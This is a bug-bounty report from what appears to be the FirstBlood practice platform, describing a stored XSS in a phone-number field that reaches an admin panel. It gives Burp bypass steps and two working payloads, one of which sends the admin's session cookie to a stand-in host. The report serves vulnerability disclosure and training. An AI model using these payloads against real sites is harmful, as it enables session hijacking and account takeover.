FirstBlood-#1191Stored XSS in Mobile no. of Hackerback Joinee
This issue was discovered on FirstBlood v3

On 2022-12-08, mr_xhunt Level 8 reported:


I have Found Stored XSS in the Mobile no. of the Joinee of the Hackerback, on the endpoint :/hackerback.html the frontend don't allow to enter any other character in the phone number but we can bypass it simply using burp

Steps To Reproduce:

  1. You need to Create a Joinee Request on /hackerback.html and Intercept the request in Burp

  1. Now Change the phone parameter value with the payload: "><img src=1 onerror=alert()>

  1. Now when the admin Login, they get an alert popup which leaks the Session Cookie


leaking cookie we need to use this payload: "><svg onload=alert(document.location=https://localhost/?${document.cookie})>


Endpoint: /drpanel/index.php

Parameter: phone

Payload: "><svg onload=alert(document.location=`https://localhost/?${document.cookie}`)>

FirstBlood ID: 59
Vulnerability Type: Stored XSS

It is possible to execute XSS against the admin via the PHONE parameter on /api/hackerback.php. The developer thought setting the input type to "tel" would prevent users from entering malicious payloads.